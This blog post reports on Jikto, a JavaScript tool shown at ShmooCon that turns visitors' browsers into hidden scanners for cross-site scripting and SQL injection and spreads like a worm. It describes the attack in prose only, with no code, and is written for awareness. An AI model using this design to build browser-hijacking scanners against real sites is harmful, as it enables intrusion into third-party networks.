Regardless of whether you’re into technology or not, you’ve probably heard various horror stories of how hackers have managed to commandeer the PCs of unsuspecting users to do their bidding. Traditionally a hacker would need to get a malicious piece of software – a.k.a. viruses and spyware – onto the intended victim’s machine before anything harmful can take place. Most computer users are aware of these dangers and have taken actions to prevent infection, such as installing anti-virus and anti-spyware software. The vast majority of users also hide behind some sort of request filtering system, be it a NAT router or even the standard Windows Firewall. Having these measures in place, along with some good computing habits, like not opening random links in e-mails, probably save many users a lot of potential hassle, and most likely also provide some ease of mind. Well, those days are over, because there’s a new hack in town.

A few weeks ago at the ShmooCon conference, Billy Hoffman, the lead engineer of SPI Dynamics, informed the security community of an exploit that had come to light along with a tool that he had developed that would be able to exploit the vulnerability to take advantage of any machine, running any browser, on any operating system, to do almost anything. The program, named Jikto, consists of a rather simple JavaScript that can be embedded in any Web page, and can be surreptitiously run upon loaded the page.Let’s start off with an example: With Jikto, a hacker could potentially scan a corporate network and “fingerprint all the Web-enabled devices found and send attacks or commands to those devices,” without any interference from a firewall, since all of this can be run directly from the browser. To a firewall it would this would be perfectly acceptable, since it would appear as if the user requested this to happen. Continuing with Hoffman’s example, once a hacker figures out the router brand and model it would be fairly trivial to send it a few commands to reconfigure the router to drop the encryption or change the password. And, to make matters even worse, it would also be possible for a hacker to mask the attack in such a way as fool the IT techs into thinking that the attack came from an insider, instead a hacker thousands of miles away.

So how exactly is Jikto supposed to do all this? Once a casual Internet surfer visits a site that has Jikto embedded in it, the JavaScript will execute. Jikto will essentially take over that browser and turn it into a scanning tool that can then scan other websites for cross-site scripting or SQL injection vulnerabilities and report any findings back to a third party, probably a hacker. Once a target is located, a hacker can then inject targeted code into the website through the vulnerability that Jikto has found. This code then has the potential to filter down from the website to the company’s network and into a specific Web-enabled device.

Not only will Jikto be able to find and report on cross-site scripting or SQL injection vulnerabilities, it will also be able to self-propagate, much like a worm, using these same cross-site scripting exploit. From this new location it will then be able to infect and commandeer the browsers of other unbeknownst users. Since Jikto only takes over the client’s browser, and does so silently without alerting the user, it does not affect any other part of the machine, which is part of the reason that traditional security applications will have a harder time catching it.

So, at the center of this potentially devastating exploit tool is Web 2.0, or more specifically, the ubiquitous use of JavaScript to enable AJAX—a programming technique designed to make sited more user interactive; think Digg.com. On the one hand, it may seems surprising that a tool like Jikto took so long to appear, since JavaScript as been used for almost a decade now, and the exploit that is now being used is certainly nothing new. But then again, a tool like Jikto can only be truly effective if a great number of sites have JavaScript enabled, forcing users to do the same. The success of Jikto depends on the number of PC that it can be run on, much like BitTorrent in a sense. As Steve Gibson explains, “Jikto runs in a web browser and distributes the bug-hunting task across multiple PCs.” What makes Jikto so incredibly dangerous is that it’s immune to all current anti-malware solutions. The only true way of stopping what Jikto is capable of would be to browse without JavaScripting enabled. Unfortunately, doing so would break a vast number, if not the majority, of websites today. Even for a simple blog, such as this one, to work correctly JavaScripting has to be enabled.

The reason that Jikto has managed to garner so much attention in the last few weeks is the fact that it’s a very clever way of scanning for vulnerabilities using a language that practically any browser can understand—even certain cell phone browser will succumb to its will. In the words of Billy Hoffman, “Jikto going to drastically change the scope of evil things you can do with JavaScript.” Continuing on, he states that “Jikto turns any PC into my little drone. Your PC will start attacking websites on my behalf, and you’re going to give me all of the results.” Coming from white-hat hacker Billy Hoffman, this probably sounds more sadistic than it really is, since he has refrained from releasing Jikto into the wild. Unfortunately, there have already been reports of sightings of the Jikto’s source code. The eventual appearance of Jikto, or rather some program like it, is pretty much inevitable. Once the hacker community knows that the exploit exists and how to implement it, writing a program to take advantage of it is really quite trivial.

For more information about the vulnerability of JavaScript check out Steve Gibson’s podcast Security Now! and also take a look at these webcasts for SPI Dynamics.